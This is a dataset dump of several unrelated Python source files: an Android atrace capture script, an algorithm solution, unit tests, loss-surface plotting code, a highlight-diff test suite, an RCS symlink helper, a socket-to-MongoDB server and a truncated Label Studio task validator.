id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
8143362 | import glob
import os
import sys
import ftrace
import argparse
import time
from ftrace import Ftrace, Interval
from pandas import Series
from saber_common import execCmd
from saber_common import get_out_systrace_path
if __name__ == '__main__':
    # Capture atrace + DDR/SNOC/GPU clock logs from an attached Android
    # device for a user-specified duration, then convert the atrace output
    # into a systrace HTML report on the PC side.
    parser = argparse.ArgumentParser(description='get atrace/ddr/gpu/snoc logs')
    parser.add_argument('-t', '--time', dest='time', help='hope to capture time')
    args = parser.parse_args()
    # print() with a single argument behaves the same on Python 2 and 3;
    # the original used Python-2-only `print x` statements.
    print(args.time)

    # Restart adbd as root, then clear the on-device and on-PC scratch dirs.
    os.system('adb root')
    os.system('adb shell rm -r /data/local/tmp/')
    os.system('adb shell mkdir /data/local/tmp/')
    os.system('rm -r ./data/tmp/')

    # Ensure /system/bin/ddr_clock_read.sh exists on the device; if /system
    # is read-only, disable verity, reboot, remount and retry the push.
    status = os.system('adb shell ls /system/bin/ |grep -i ddr_clock_read.sh')
    if status != 0:
        txt = execCmd('adb push ./toolsForAndroid/ddr_clock_read.sh /system/bin/')
        if 'Read-only file system' in txt:
            txt = execCmd('adb root')
            print(txt)
            txt = execCmd('adb disable-verity')
            print(txt)
            os.system('adb reboot')
            # assumes the device finishes booting within 60 s — TODO confirm
            time.sleep(60)
            os.system('adb root')
            os.system('adb remount')
            txt = execCmd('adb push ./toolsForAndroid/ddr_clock_read.sh /system/bin/')
        os.system('adb shell chmod a+x /system/bin/ddr_clock_read.sh')

    # Push the remaining helper scripts if they are missing.
    status = os.system('adb shell ls /system/bin/ |grep -i snoc_clock_read.sh')
    if status != 0:
        os.system('adb push ./toolsForAndroid/snoc_clock_read.sh /system/bin/')
        os.system('adb shell chmod a+x /system/bin/snoc_clock_read.sh')
    status = os.system('adb shell ls /system/bin/ |grep -i gpu_clock_read.sh')
    if status != 0:
        os.system('adb push ./toolsForAndroid/gpu_clock_read.sh /system/bin/')
        os.system('adb shell chmod a+x /system/bin/gpu_clock_read.sh')

    # Start atrace and the three clock readers in the background
    # (typo fix: CATEGORYS -> CATEGORIES; local name only).
    CATEGORIES = 'gfx input view webview wm am sm audio video hal res dalvik rs bionic ' \
                 ' power pm ss database network adb aidl sched irq freq ' \
                 ' idle disk memreclaim workq regulators binder_driver binder_lock '
    CMD = 'adb shell atrace -b 10240 -t '\
        + args.time + ' -o /data/local/tmp/atrace.out ' + CATEGORIES + ' & '
    os.system(CMD)
    os.system('adb shell ./system/bin/ddr_clock_read.sh -i 1 -t ' + args.time + ' -o & ')
    os.system('adb shell ./system/bin/snoc_clock_read.sh -i 1 -t ' + args.time + ' -o & ')
    os.system('adb shell ./system/bin/gpu_clock_read.sh -i 1 -t ' + args.time + ' -o & ')

    # Wait for the background captures to finish (20 s of slack).
    time.sleep(int(args.time) + 20)
    # Pull everything from /data/local/tmp and convert atrace.out to HTML.
    os.system('adb pull /data/local/tmp/ ./data/')
    os.system('python ./toolsForAndroid/systrace/systrace.py --from-file ./data/tmp/atrace.out -o ' + get_out_systrace_path())
12842410 | <gh_stars>10-100
# Write a program to find the nth super ugly number.
# Super ugly numbers are positive numbers
# whose all prime factors are in the given prime list primes of size k.
# Example:
# Input: n = 12, primes = [2,7,13,19]
# Output: 32
# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first 12
# super ugly numbers given primes = [2,7,13,19] of size 4.
# Note:
# 1 is a super ugly number for any given primes.
# The given numbers in primes are in ascending order.
# 0 < k ≤ 100, 0 < n ≤ 106, 0 < primes[i] < 1000.
# The nth super ugly number is guaranteed to fit in a 32-bit signed integer.
class Solution:
    def nthSuperUglyNumber(self, n: int, primes: list[int]) -> int:
        """Return the n-th super ugly number.

        A super ugly number is a positive integer whose prime factors all
        belong to ``primes``.  1 counts as the first super ugly number.

        Fixes vs. original: the ``List[int]`` annotation required a missing
        ``from typing import List`` (builtin ``list[int]`` used instead),
        and a dead ``mn = float('inf')`` assignment was removed (it was
        always overwritten by ``min(tmp)``).

        Runs in O(n * k) time for k = len(primes).
        """
        ugly = [1]
        # idx[i]: index into `ugly` of the next value to multiply by primes[i]
        idx = [0] * len(primes)
        while len(ugly) < n:
            candidates = [ugly[idx[i]] * primes[i] for i in range(len(primes))]
            nxt = min(candidates)
            # Advance every pointer that produced `nxt` so duplicates
            # (e.g. 2*7 and 7*2) are emitted only once.
            for i, cand in enumerate(candidates):
                if cand == nxt:
                    idx[i] += 1
            ugly.append(nxt)
        return ugly[-1]
1810780 | <gh_stars>1-10
""" Tests for warnings context managers
"""
from __future__ import division, print_function, absolute_import
import sys
import warnings
import numpy as np
from nose.tools import assert_equal
from nose.tools import assert_raises
from ..testing import (error_warnings, suppress_warnings,
clear_and_catch_warnings, assert_allclose_safely,
get_fresh_mod, assert_re_in)
def assert_warn_len_equal(mod, n_in_context):
    """Assert that *mod*'s ``__warningregistry__`` has *n_in_context* entries.

    NOTE(review): an identical function is re-defined later in this module
    and shadows this one; one of the two copies should be removed.
    """
    mod_warns = mod.__warningregistry__
    # Python 3.4 appears to clear any pre-existing warnings of the same type,
    # when raising warnings inside a catch_warnings block. So, there is a
    # warning generated by the tests within the context manager, but no
    # previous warnings.
    if 'version' in mod_warns:
        assert_equal(len(mod_warns), 2)  # including 'version'
    else:
        assert_equal(len(mod_warns), n_in_context)
def test_assert_allclose_safely():
    """Exercise assert_allclose_safely on scalars, arrays, NaNs and infs."""
    # Test the safe version of allclose
    assert_allclose_safely([1, 1], [1, 1])
    assert_allclose_safely(1, 1)
    assert_allclose_safely(1, [1, 1])
    assert_allclose_safely([1, 1], 1 + 1e-6)
    assert_raises(AssertionError, assert_allclose_safely, [1, 1], 1 + 1e-4)
    # Broadcastable matrices
    a = np.ones((2, 3))
    b = np.ones((3, 2, 3))
    # `np.float` was removed in NumPy 1.24; the builtin float is the
    # documented replacement (same float64 precision).
    eps = np.finfo(float).eps
    a[0, 0] = 1 + eps
    assert_allclose_safely(a, b)
    a[0, 0] = 1 + 1.1e-5
    assert_raises(AssertionError, assert_allclose_safely, a, b)
    # Nans in same place
    a[0, 0] = np.nan
    b[:, 0, 0] = np.nan
    assert_allclose_safely(a, b)
    # Never equal with nans present, if not matching nans
    assert_raises(AssertionError,
                  assert_allclose_safely, a, b,
                  match_nans=False)
    b[0, 0, 0] = 1
    assert_raises(AssertionError, assert_allclose_safely, a, b)
    # Test allcloseness of inf, especially extended-precision infs.
    # `np.sctypes['float']` was removed in NumPy 2.0; enumerate the float
    # scalar types it used to return.
    for dtt in (np.float16, np.float32, np.float64, np.longdouble):
        a = np.array([-np.inf, 1, np.inf], dtype=dtt)
        b = np.array([-np.inf, 1, np.inf], dtype=dtt)
        assert_allclose_safely(a, b)
        b[1] = 0
        assert_raises(AssertionError, assert_allclose_safely, a, b)
    # Empty compares equal to empty
    assert_allclose_safely([], [])
def assert_warn_len_equal(mod, n_in_context):
    """Assert that *mod*'s ``__warningregistry__`` has *n_in_context* entries.

    NOTE(review): this is a byte-for-byte duplicate of the definition
    earlier in the module (apart from one comment) and shadows it;
    consider deleting one copy.
    """
    mod_warns = mod.__warningregistry__
    # Python 3 appears to clear any pre-existing warnings of the same type,
    # when raising warnings inside a catch_warnings block. So, there is a
    # warning generated by the tests within the context manager, but no
    # previous warnings.
    if 'version' in mod_warns:
        assert_equal(len(mod_warns), 2)  # including 'version'
    else:
        assert_equal(len(mod_warns), n_in_context)
def test_clear_and_catch_warnings():
    """Check that clear_and_catch_warnings clears/restores module registries."""
    # Initial state of module, no warnings
    my_mod = get_fresh_mod(__name__)
    assert_equal(getattr(my_mod, '__warningregistry__', {}), {})
    with clear_and_catch_warnings(modules=[my_mod]):
        warnings.simplefilter('ignore')
        warnings.warn('Some warning')
    # Registry restored to empty after leaving the context.
    assert_equal(my_mod.__warningregistry__, {})
    # Without specified modules, don't clear warnings during context
    with clear_and_catch_warnings():
        warnings.warn('Some warning')
    assert_warn_len_equal(my_mod, 1)
    # Confirm that specifying module keeps old warning, does not add new
    with clear_and_catch_warnings(modules=[my_mod]):
        warnings.warn('Another warning')
    assert_warn_len_equal(my_mod, 1)
    # Another warning, no module spec does add to warnings dict, except on
    # Python 3 (see comments in `assert_warn_len_equal`)
    with clear_and_catch_warnings():
        warnings.warn('Another warning')
    assert_warn_len_equal(my_mod, 2)
class my_cacw(clear_and_catch_warnings):
    """Subclass with this test module registered as a default module."""
    class_modules = (sys.modules[__name__],)
def test_clear_and_catch_warnings_inherit():
    # Test can subclass and add default modules
    my_mod = get_fresh_mod(__name__)
    with my_cacw():
        warnings.simplefilter('ignore')
        warnings.warn('Some warning')
    # Registry of the class-default module is restored on exit.
    assert_equal(my_mod.__warningregistry__, {})
def test_warn_error():
    # Check warning error context manager
    n_warns = len(warnings.filters)
    with error_warnings():
        # Inside the context every warning is raised as an exception.
        assert_raises(UserWarning, warnings.warn, 'A test')
    with error_warnings() as w:  # w not used for anything
        assert_raises(UserWarning, warnings.warn, 'A test')
    # Filter list restored after leaving the contexts.
    assert_equal(n_warns, len(warnings.filters))
    # Check other errors are propagated
    def f():
        with error_warnings():
            raise ValueError('An error')
    assert_raises(ValueError, f)
def test_warn_ignore():
    # Check warning ignore context manager
    n_warns = len(warnings.filters)
    with suppress_warnings():
        # Both plain and DeprecationWarning warnings are silenced.
        warnings.warn('Here is a warning, you will not see it')
        warnings.warn('Nor this one', DeprecationWarning)
    with suppress_warnings() as w:  # w not used
        warnings.warn('Here is a warning, you will not see it')
        warnings.warn('Nor this one', DeprecationWarning)
    # Filter list restored after leaving the contexts.
    assert_equal(n_warns, len(warnings.filters))
    # Check other errors are propagated
    def f():
        with suppress_warnings():
            raise ValueError('An error')
    assert_raises(ValueError, f)
def test_assert_re_in():
    """Check assert_re_in on strings, lists and tuples of candidates."""
    assert_re_in(".*", "")
    assert_re_in(".*", ["any"])
    # Should do match not search
    assert_re_in("ab", "abc")
    assert_raises(AssertionError, assert_re_in, "ab", "cab")
    assert_raises(AssertionError, assert_re_in, "ab$", "abc")
    # Sufficient to have one entry matching
    assert_re_in("ab", ["", "abc", "laskdjf"])
    assert_raises(AssertionError, assert_re_in, "ab$", ["ddd", ""])
    # Tuples should be ok too
    assert_re_in("ab", ("", "abc", "laskdjf"))
    assert_raises(AssertionError, assert_re_in, "ab$", ("ddd", ""))
    # Shouldn't "match" the empty list
    assert_raises(AssertionError, assert_re_in, "", [])
| StarcoderdataPython |
9714214 | <gh_stars>0
"""
2D plotting funtions
"""
from mpl_toolkits.mplot3d import Axes3D
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib import cm
import h5py
import argparse
import numpy as np
from os.path import exists
import seaborn as sns
def plot_2d_contour(surf_file, surf_name='train_loss', vmin=0.1, vmax=10, vlevel=0.5, show=False):
    """Plot a 2D contour map, filled contour, heatmap and 3D surface.

    Reads x/y coordinates and the ``surf_name`` dataset from the HDF5 file
    ``surf_file`` and writes four PDF figures next to it.

    Fixes vs. original: returns early (and closes the file) when
    ``surf_name`` is missing — the original fell through and crashed with a
    NameError because ``Z`` was never assigned — and closes the file on the
    too-few-coordinates early return, which previously leaked the handle.
    """
    f = h5py.File(surf_file, 'r')
    x = np.array(f['xcoordinates'][:])
    y = np.array(f['ycoordinates'][:])
    X, Y = np.meshgrid(x, y)

    if surf_name in f.keys():
        Z = np.array(f[surf_name][:])
    elif surf_name == 'train_err' or surf_name == 'test_err':
        # NOTE(review): this branch only runs when surf_name is absent from
        # f.keys(), so f[surf_name] raises KeyError here — confirm the
        # intended dataset key for error surfaces.
        Z = 100 - np.array(f[surf_name][:])
    else:
        print('%s is not found in %s' % (surf_name, surf_file))
        f.close()
        return

    print('------------------------------------------------------------------')
    print('plot_2d_contour')
    print('------------------------------------------------------------------')
    print("loading surface file: " + surf_file)
    print('len(xcoordinates): %d len(ycoordinates): %d' % (len(x), len(y)))
    print('max(%s) = %f \t min(%s) = %f' % (surf_name, np.max(Z), surf_name, np.min(Z)))
    print(Z)

    if len(x) <= 1 or len(y) <= 1:
        print('The length of coordinates is not enough for plotting contours')
        f.close()
        return

    # --------------------------------------------------------------------
    # Plot 2D contours
    # --------------------------------------------------------------------
    fig = plt.figure()
    CS = plt.contour(X, Y, Z, cmap='summer', levels=np.arange(vmin, vmax, vlevel))
    plt.clabel(CS, inline=1, fontsize=8)
    fig.savefig(surf_file + '_' + surf_name + '_2dcontour' + '.pdf', dpi=300,
                bbox_inches='tight', format='pdf')

    fig = plt.figure()
    print(surf_file + '_' + surf_name + '_2dcontourf' + '.pdf')
    CS = plt.contourf(X, Y, Z, cmap='summer', levels=np.arange(vmin, vmax, vlevel))
    fig.savefig(surf_file + '_' + surf_name + '_2dcontourf' + '.pdf', dpi=300,
                bbox_inches='tight', format='pdf')

    # --------------------------------------------------------------------
    # Plot 2D heatmaps
    # --------------------------------------------------------------------
    fig = plt.figure()
    sns_plot = sns.heatmap(Z, cmap='viridis', cbar=True, vmin=vmin, vmax=vmax,
                           xticklabels=False, yticklabels=False)
    sns_plot.invert_yaxis()
    sns_plot.get_figure().savefig(surf_file + '_' + surf_name + '_2dheat.pdf',
                                  dpi=300, bbox_inches='tight', format='pdf')

    # --------------------------------------------------------------------
    # Plot 3D surface
    # --------------------------------------------------------------------
    fig = plt.figure()
    ax = Axes3D(fig)
    surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm, linewidth=0, antialiased=False)
    fig.colorbar(surf, shrink=0.5, aspect=5)
    fig.savefig(surf_file + '_' + surf_name + '_3dsurface.pdf', dpi=300,
                bbox_inches='tight', format='pdf')

    f.close()
    if show: plt.show()
def plot_trajectory(proj_file, dir_file, show=False):
    """ Plot optimization trajectory on the plane spanned by given directions."""
    print(proj_file)
    assert exists(proj_file), 'Projection file does not exist.'
    f = h5py.File(proj_file, 'r')
    fig = plt.figure()
    plt.plot(f['proj_xcoord'], f['proj_ycoord'], marker='.')
    plt.tick_params('y', labelsize='x-large')
    plt.tick_params('x', labelsize='x-large')
    f.close()
    # Annotate the axes with PCA explained-variance ratios when the
    # directions file provides them.
    if exists(dir_file):
        f2 = h5py.File(dir_file, 'r')
        if 'explained_variance_ratio_' in f2.keys():
            ratio_x = f2['explained_variance_ratio_'][0]
            ratio_y = f2['explained_variance_ratio_'][1]
            plt.xlabel('1st PC: %.2f %%' % (ratio_x*100), fontsize='xx-large')
            plt.ylabel('2nd PC: %.2f %%' % (ratio_y*100), fontsize='xx-large')
        f2.close()
    # Figure is written next to the projection file.
    fig.savefig(proj_file + '.pdf', dpi=300, bbox_inches='tight', format='pdf')
    if show: plt.show()
def plot_contour_trajectory(surf_file, dir_file, proj_file, surf_name='loss_vals',
                            vmin=0.1, vmax=10, vlevel=0.5, show=False):
    """Plot 2D loss contours with the optimization trajectory overlaid.

    Fixes vs. original: bails out (with a message) when ``surf_name`` is
    missing — previously ``Z`` was never assigned and ``plt.contour``
    crashed with a NameError — and closes the surface file, which the
    original never closed.
    """
    assert exists(surf_file) and exists(proj_file) and exists(dir_file)

    # plot contours
    f = h5py.File(surf_file, 'r')
    x = np.array(f['xcoordinates'][:])
    y = np.array(f['ycoordinates'][:])
    X, Y = np.meshgrid(x, y)
    if surf_name not in f.keys():
        print('%s is not found in %s' % (surf_name, surf_file))
        f.close()
        return
    Z = np.array(f[surf_name][:])
    f.close()  # the original leaked this handle

    fig = plt.figure()
    CS1 = plt.contour(X, Y, Z, levels=np.arange(vmin, vmax, vlevel))
    CS2 = plt.contour(X, Y, Z, levels=np.logspace(1, 8, num=8))

    # plot trajectories
    pf = h5py.File(proj_file, 'r')
    plt.plot(pf['proj_xcoord'], pf['proj_ycoord'], marker='.')

    # add PCA explained-variance annotations from the directions file
    df = h5py.File(dir_file, 'r')
    ratio_x = df['explained_variance_ratio_'][0]
    ratio_y = df['explained_variance_ratio_'][1]
    plt.xlabel('1st PC: %.2f %%' % (ratio_x*100), fontsize='xx-large')
    plt.ylabel('2nd PC: %.2f %%' % (ratio_y*100), fontsize='xx-large')
    df.close()

    plt.clabel(CS1, inline=1, fontsize=6)
    plt.clabel(CS2, inline=1, fontsize=6)
    fig.savefig(proj_file + '_' + surf_name + '_2dcontour_proj.pdf', dpi=300,
                bbox_inches='tight', format='pdf')
    pf.close()
    if show: plt.show()
def plot_2d_eig_ratio(surf_file, val_1='min_eig', val_2='max_eig', show=False):
    """ Plot the heatmap of eigenvalue ratios, i.e., |min_eig/max_eig| of hessian """
    print('------------------------------------------------------------------')
    print('plot_2d_eig_ratio')
    print('------------------------------------------------------------------')
    print("loading surface file: " + surf_file)
    f = h5py.File(surf_file,'r')
    x = np.array(f['xcoordinates'][:])
    y = np.array(f['ycoordinates'][:])
    # NOTE(review): X and Y are computed but never used by the heatmaps below.
    X, Y = np.meshgrid(x, y)
    Z1 = np.array(f[val_1][:])
    Z2 = np.array(f[val_2][:])
    # Plot 2D heatmaps with color bar using seaborn
    # NOTE(review): np.divide emits inf/nan where Z2 has zeros — confirm
    # whether the surface data guarantees Z2 != 0.
    abs_ratio = np.absolute(np.divide(Z1, Z2))
    print(abs_ratio)
    fig = plt.figure()
    sns_plot = sns.heatmap(abs_ratio, cmap='viridis', vmin=0, vmax=.5, cbar=True,
                           xticklabels=False, yticklabels=False)
    sns_plot.invert_yaxis()
    sns_plot.get_figure().savefig(surf_file + '_' + val_1 + '_' + val_2 + '_abs_ratio_heat_sns.pdf',
                                  dpi=300, bbox_inches='tight', format='pdf')
    # Plot 2D heatmaps with color bar using seaborn (signed ratio this time)
    ratio = np.divide(Z1, Z2)
    print(ratio)
    fig = plt.figure()
    sns_plot = sns.heatmap(ratio, cmap='viridis', cbar=True, xticklabels=False, yticklabels=False)
    sns_plot.invert_yaxis()
    sns_plot.get_figure().savefig(surf_file + '_' + val_1 + '_' + val_2 + '_ratio_heat_sns.pdf',
                                  dpi=300, bbox_inches='tight', format='pdf')
    f.close()
    if show: plt.show()
if __name__ == '__main__':
    # CLI entry point: dispatch to the richest plot the provided files allow
    # (surface + trajectory > trajectory only > surface only).
    parser = argparse.ArgumentParser(description='Plot 2D loss surface')
    parser.add_argument('--surf_file', '-f', default='', help='The h5 file that contains surface values')
    parser.add_argument('--dir_file', default='', help='The h5 file that contains directions')
    parser.add_argument('--proj_file', default='', help='The h5 file that contains the projected trajectories')
    parser.add_argument('--surf_name', default='train_loss', help='The type of surface to plot')
    parser.add_argument('--vmax', default=10, type=float, help='Maximum value to map')
    parser.add_argument('--vmin', default=0.1, type=float, help='Miminum value to map')
    parser.add_argument('--vlevel', default=0.5, type=float, help='plot contours every vlevel')
    parser.add_argument('--zlim', default=10, type=float, help='Maximum loss value to show')
    parser.add_argument('--show', action='store_true', default=False, help='show plots')
    args = parser.parse_args()

    if exists(args.surf_file) and exists(args.proj_file) and exists(args.dir_file):
        plot_contour_trajectory(args.surf_file, args.dir_file, args.proj_file,
                                args.surf_name, args.vmin, args.vmax, args.vlevel, args.show)
    elif exists(args.proj_file) and exists(args.dir_file):
        plot_trajectory(args.proj_file, args.dir_file, args.show)
    elif exists(args.surf_file):
        plot_2d_contour(args.surf_file, args.surf_name, args.vmin, args.vmax, args.vlevel, args.show)
| StarcoderdataPython |
11297484 | import itertools
import jinja2
import os
import re
import tempfile
import subprocess
from server import highlight
from tests import OkTestCase, skipIfWindows
_striptags_re = re.compile(r'(<!--.*?-->|<[^>]*>)')
def striptags(s):
    """Strip HTML comments/tags from *s* and unescape HTML entities.

    NOTE(review): ``jinja2.Markup`` is deprecated in Jinja 3.x; prefer
    ``markupsafe.Markup`` — confirm the pinned jinja2 version.
    """
    stripped = _striptags_re.sub('', s)
    return jinja2.Markup(stripped).unescape()
def apply_patch(patch, source):
    """Applies a patch to a source string, returning the result string.

    Writes *source* to a temp file, runs the external ``patch`` tool with
    the patch text on stdin, and reads the patched output from a second
    temp file. Raises AssertionError when ``patch`` exits non-zero.
    """
    with tempfile.NamedTemporaryFile('w+') as infile:
        with tempfile.NamedTemporaryFile('r') as outfile:
            infile.write(source)
            # Flush so the external `patch` process sees the full contents:
            # NamedTemporaryFile writes are buffered in this process, and
            # the original could hand `patch` a partially-written file.
            infile.flush()
            proc = subprocess.Popen(['patch', '-p0', '-o', outfile.name, infile.name],
                                    stdin=subprocess.PIPE,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE,
                                    universal_newlines=True)
            outs, errs = proc.communicate(input=patch)
            if proc.returncode != 0:
                raise AssertionError('patch failed: {0}'.format(errs))
            return outfile.read()
class TestHighlight(OkTestCase):
    """Tests for server.highlight: round-tripping highlighted files/diffs."""

    def setUp(self):
        super(TestHighlight, self).setUp()
        with open('tests/files/difflib_before.py', encoding='utf-8') as fobj:
            before = fobj.read()
        with open('tests/files/difflib_after.py', encoding='utf-8') as fobj:
            after = fobj.read()
        # Fixture sources keyed by filename (extension drives the lexer).
        self.files = {
            'before.py': before,
            'after.py': after,
            'empty.py': '',
            'empty': '',
        }

    def _test_highlight_file(self, filename, source):
        """Highlighting then stripping tags must reproduce *source* exactly."""
        source_lines = source.splitlines(keepends=True)
        highlighted = list(highlight.highlight_file(filename, source))
        # Check format
        for line in highlighted:
            assert source_lines[line.line_after - 1] == striptags(line.contents)
        # Check that removing tags gives the same file
        assert source_lines == [striptags(line.contents) for line in highlighted]

    def _test_highlight_diff(self, filename, a, b, diff_type):
        """A highlighted diff, stripped of tags, must be a valid patch a -> b."""
        a_lines = a.splitlines(keepends=True)
        b_lines = b.splitlines(keepends=True)
        highlighted = list(highlight.highlight_diff(filename, a, b, diff_type))
        # Check format: each line's marker/character and line numbers agree
        # with its tag.
        for line in highlighted:
            stripped = striptags(line.contents)
            start = stripped[0]
            source = stripped[1:]
            if line.tag == 'header':
                assert line.line_before is None
                assert line.line_after is None
            elif line.tag == 'delete':
                assert start == '-'
                assert a_lines[line.line_before - 1] == source
                assert line.line_after is None
            elif line.tag == 'insert':
                assert start == '+'
                assert line.line_before is None
                assert b_lines[line.line_after - 1] == source
            elif line.tag == 'equal':
                assert start == ' '
                assert a_lines[line.line_before - 1] == source
                assert b_lines[line.line_after - 1] == source
            else:
                raise AssertionError('Unknown tag {0}'.format(line.tag))
        # Check that removing tags gives a patch that can be applied
        patch = ''.join(striptags(line.contents) for line in highlighted)
        assert b_lines == apply_patch(patch, a).splitlines(keepends=True)

    def test_highlight_file(self):
        for filename, source in self.files.items():
            self._test_highlight_file(filename, source)

    @skipIfWindows
    def test_highlight_diff(self):
        # Every ordered pair of fixtures, in both short and full diff modes.
        for diff_type in ('short', 'full'):
            for a, b in itertools.combinations(self.files.values(), 2):
                self._test_highlight_diff('test.py', a, b, diff_type)

    def test_no_highlight(self):
        # Non-code content must pass through without any markup added.
        filename = 'data'
        source = 'It was the best of times, it was the worst of times, ...\n'
        source_lines = source.splitlines(keepends=True)
        highlighted = list(highlight.highlight_file(filename, source))
        for line in highlighted:
            assert source_lines[line.line_after - 1] == striptags(line.contents)
        assert source_lines == [line.contents for line in highlighted]
| StarcoderdataPython |
9660320 | #! /usr/bin/env python
# A rather specialized script to make sure that a symbolic link named
# RCS exists pointing to a real RCS directory in a parallel tree
# referenced as RCStree in an ancestor directory.
# (I use this because I like my RCS files to reside on a physically
# different machine).
import os
def main():
    """Create an RCS symlink pointing into a parallel RCStree directory.

    Walks up from the current directory until an ancestor containing
    'RCStree' is found, mirrors the relative path down inside it, creates
    the target directory if needed, and symlinks ./RCS to it.
    """
    rcstree = 'RCStree'
    rcs = 'RCS'
    if os.path.islink(rcs):
        print('%r is a symlink to %r' % (rcs, os.readlink(rcs)))
        return
    if os.path.isdir(rcs):
        print('%r is an ordinary directory' % (rcs,))
        return
    if os.path.exists(rcs):
        print('%r is a file?!?!' % (rcs,))
        return
    #
    p = os.getcwd()
    up = ''
    down = ''
    # Invariants:
    # (1) join(p, down) is the current directory
    # (2) up is the same directory as p
    # Ergo:
    # (3) join(up, down) is the current directory
    #print 'p =', repr(p)
    while not os.path.isdir(os.path.join(p, rcstree)):
        head, tail = os.path.split(p)
        #print 'head = %r; tail = %r' % (head, tail)
        if not tail:
            print('Sorry, no ancestor dir contains %r' % (rcstree,))
            return
        p = head
        up = os.path.join(os.pardir, up)
        down = os.path.join(tail, down)
        #print 'p = %r; up = %r; down = %r' % (p, up, down)
    # Relative path to the mirrored RCS directory inside the RCStree.
    there = os.path.join(up, rcstree)
    there = os.path.join(there, down)
    there = os.path.join(there, rcs)
    if os.path.isdir(there):
        print('%r already exists' % (there, ))
    else:
        print('making %r' % (there,))
        makedirs(there)
    print('making symlink %r -> %r' % (rcs, there))
    os.symlink(there, rcs)
def makedirs(p):
    """Recursively create directory *p* and any missing parents.

    Fix vs. original: the original recursed forever when a path component
    reduced to '' (os.path.split('') returns ('', '')); an empty or
    already-existing path is now a no-op.
    """
    if not p or os.path.isdir(p):
        return
    makedirs(os.path.dirname(p))
    os.mkdir(p, 0o777)

if __name__ == "__main__":
    main()
| StarcoderdataPython |
8138739 | <filename>server-socket.py<gh_stars>0
import socket
import mongoconn as CONN
import json
# Simple blocking TCP server: accept one client at a time, read two
# messages (a greeting and a JSON payload), store the payload in MongoDB.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '192.168.1.103'
s.bind((ip, 1238))
s.listen(2)
while True:
    clientsocket, address = s.accept()
    clientsocket.send(bytes("connection established", "utf-8"))
    cliente = clientsocket.getsockname()
    print(f"benvenuto {cliente}")
    msg = clientsocket.recv(1024)
    print(msg.decode("utf-8"))
    # Receive the JSON-encoded object from the vase client.
    # NOTE(review): a single recv() assumes the whole payload fits in one
    # 1024-byte read — confirm for larger payloads.
    ogg_json = clientsocket.recv(1024)
    print(ogg_json.decode("utf-8"))
    clientsocket.close()
    dati = json.loads(ogg_json)
    try:
        CONN.insert_dati(dati)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # can still stop the server.
        print("errore chiamata a funzione CONN")
| StarcoderdataPython |
11275481 | """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import logging
import ujson as json
from urllib.parse import urlparse
from django.conf import settings
from rest_framework.exceptions import ValidationError
from core.label_config import replace_task_data_undefined_with_config_field
class SkipField(Exception):
pass
# Maps object-tag names from the labeling config to the Python types their
# task data values are allowed to have (see TaskValidator.check_data).
_DATA_TYPES = {
    'Text': [str, int, float],
    'Header': [str, int, float],
    'HyperText': [str],
    'Image': [str, list],
    'Paragraphs': [list, str],
    'Table': [dict],
    'TimeSeries': [dict, list, str],
    'TimeSeriesChannel': [dict, list, str]
}
logger = logging.getLogger(__name__)
class TaskValidator:
    """ Task Validator with project scheme configs validation. It is equal to TaskSerializer from django backend.
    """

    def __init__(self, project, instance=None):
        self.project = project
        self.instance = instance
        # Totals accumulated by to_internal_value over all validated items.
        self.annotation_count = 0
        self.prediction_count = 0

    @staticmethod
    def check_data(project, data):
        """Validate task['data'] against the project's configured data types.

        Raises ValidationError on a missing key or a type mismatch;
        returns the (possibly normalized) data dict on success.
        """
        if data is None:
            raise ValidationError('Task is empty (None)')
        replace_task_data_undefined_with_config_field(data, project)

        # iterate over data types from project
        for data_key, data_type in project.data_types.items():
            # get array name in case of Repeater tag, e.g. "items[0]" -> "items"
            is_array = '[' in data_key
            data_key = data_key.split('[')[0]

            if data_key not in data:
                raise ValidationError('"{data_key}" key is expected in task data'.format(data_key=data_key))

            if is_array:
                expected_types = (list, )
            else:
                expected_types = _DATA_TYPES.get(data_type, (str,))

            if not isinstance(data[data_key], tuple(expected_types)):
                raise ValidationError('data[\'{data_key}\']={data_value} is of type \'{type}\', '
                                      "but the object tag {data_type} expects the following types: {expected_types}"
                                      .format(data_key=data_key, data_value=data[data_key],
                                              type=type(data[data_key]).__name__, data_type=data_type,
                                              expected_types=[e.__name__ for e in expected_types]))

            if data_type == 'List':
                for item in data[data_key]:
                    key = 'text'  # FIXME: read key from config (elementValue from List)
                    if key not in item:
                        raise ValidationError('Each item from List must have key ' + key)

        return data

    @staticmethod
    def check_data_and_root(project, data, dict_is_root=False):
        """ Check data consistent and data is dict with task or dict['task'] is task

        :param project: project whose config defines the expected data keys
        :param data: candidate task data dict
        :param dict_is_root: True when the item itself (not item['data']) is
            being treated as the task data — only affects the error message
        :return: None; re-raises ValidationError with a clarifying suffix
        """
        try:
            TaskValidator.check_data(project, data)
        except ValidationError as e:
            if dict_is_root:
                raise ValidationError(e.detail[0] + ' [assume: item as is = task root with values] ')
            else:
                raise ValidationError(e.detail[0] + ' [assume: item["data"] = task root with values]')

    @staticmethod
    def check_allowed(task):
        """Return True when the task dict has the required 'data' key."""
        # task is required
        if 'data' not in task:
            return False
        # everything is ok
        return True

    @staticmethod
    def raise_if_wrong_class(task, key, class_def):
        """Raise ValidationError when task[key] exists but has the wrong type."""
        if key in task and not isinstance(task[key], class_def):
            raise ValidationError('Task[{key}] must be {class_def}'.format(key=key, class_def=class_def))

    def validate(self, task):
        """ Validate whole task with task['data'] and task['annotations']. task['predictions']
        """
        # task is class (model instance) — validate its .data attribute
        if hasattr(task, 'data'):
            self.check_data_and_root(self.project, task.data)
            return task

        # self.instance is loaded by get_object of view
        if self.instance and hasattr(self.instance, 'data'):
            if isinstance(self.instance.data, dict):
                data = self.instance.data
            elif isinstance(self.instance.data, str):
                try:
                    data = json.loads(self.instance.data)
                except ValueError as e:
                    raise ValidationError("Can't parse task data: " + str(e))
            else:
                # Fix vs. original: concatenating the type object itself
                # ('...' + type(x) + '...') raised TypeError instead of the
                # intended ValidationError; use the type's name.
                raise ValidationError('Field "data" must be string or dict, but not "'
                                      + type(self.instance.data).__name__ + '"')
